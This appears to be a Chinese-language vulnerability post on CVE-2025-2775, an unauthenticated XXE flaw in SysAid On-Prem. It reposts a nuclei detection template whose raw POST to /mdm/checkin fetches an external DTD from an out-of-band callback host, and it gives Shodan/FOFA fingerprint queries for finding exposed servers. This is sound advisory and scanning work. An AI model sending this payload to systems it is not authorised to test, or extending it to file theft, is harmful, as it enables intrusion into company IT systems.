SysAid On-Prem XML External Entity Vulnerability

漏洞信息

漏洞名称: SysAid On-Prem XML External Entity Vulnerability

漏洞编号:

  • CVE: CVE-2025-2775

漏洞类型: XML实体注入

漏洞等级: 严重

漏洞描述: SysAid On-Prem是一款广泛使用的IT服务管理软件,适用于企业级服务管理,提供IT支持、资产管理等功能,通常部署在企业内部网络中。该软件的版本23.3.40及之前版本存在一个未认证的XML外部实体(XXE)漏洞,位于Checkin处理功能中。此漏洞的技术根源在于对XML输入的不当处理,允许攻击者通过构造恶意的XML实体来读取文件内容或执行服务器端请求伪造(SSRF)攻击,进而可能导致管理员账户被接管。由于该漏洞无需认证即可利用,攻击者可以远程发起攻击,对受影响系统造成严重影响,包括敏感数据泄露和服务中断。此漏洞的CVSS评分为9.3,属于严重级别,已被列入已知被利用漏洞(KEV)目录,因此需要立即修补以防止潜在的大规模攻击。

产品厂商: sysaid

产品名称: SysAid On-Prem

影响版本: <= 23.3.40

搜索语法: http.favicon.hash:”1540720428” OR icon_hash=1540720428

来源: https://github.com/projectdiscovery/nuclei-templates/blob/01a59299771e9178d0aadf2065d772c10e58fac8/http%2Fcves%2F2025%2FCVE-2025-2775.yaml

类型: projectdiscovery/nuclei-templates:github issues

POC详情

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54

id: CVE-2025-2775

info:
name: SysAid On-Prem <= 23.3.40 - XML External Entity
author: johnk3r
severity: critical
description: |
SysAid On-Prem versions <= 23.3.40 are vulnerable to an unauthenticated XML External Entity (XXE) vulnerability in the Checkin processing functionality, allowing for administrator account takeover and file read primitives.
reference:
- https://labs.watchtowr.com/sysowned-your-friendly-rce-support-ticket/
- https://documentation.sysaid.com/docs/24-40-60
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:L
cvss-score: 9.3
cve-id: CVE-2025-2775
cwe-id: CWE-611
metadata:
max-request: 1
vendor: sysaid
product: sysaid
shodan-query: http.favicon.hash:"1540720428"
fofa-query: icon_hash=1540720428
tags: cve,cve2025,oast,sysaid,xxe,kev

variables:
filename: "{{to_lower(rand_text_alpha(5))}}"

http:
- raw:
- |
POST /mdm/checkin HTTP/1.1
Host: {{Hostname}}
Content-Type: application/xml

<?xml version="1.0" ?>
<!DOCTYPE foo [
<!ENTITY % foo SYSTEM "http://{{interactsh-url}}/{{filename}}.dtd">
%foo;
]>

matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- "http"

- type: word
part: interactsh_request
words:
- "User-Agent: Java"
# digest: 4b0a00483046022100a663cc73b992dc990d74eefc3c09fd70452f44d25e376b57aa74006e5c74ff10022100f485e0461d196c6b9c2570c331cb47900c2367c14b6849b1a44057d6e7e4b7cd:922c64590222798bb761d5b6d8e72950


SysAid On-Prem XML External Entity Vulnerability
http://example.com/2025/07/28/github_36638445/
作者
lianccc
发布于
2025年7月28日
许可协议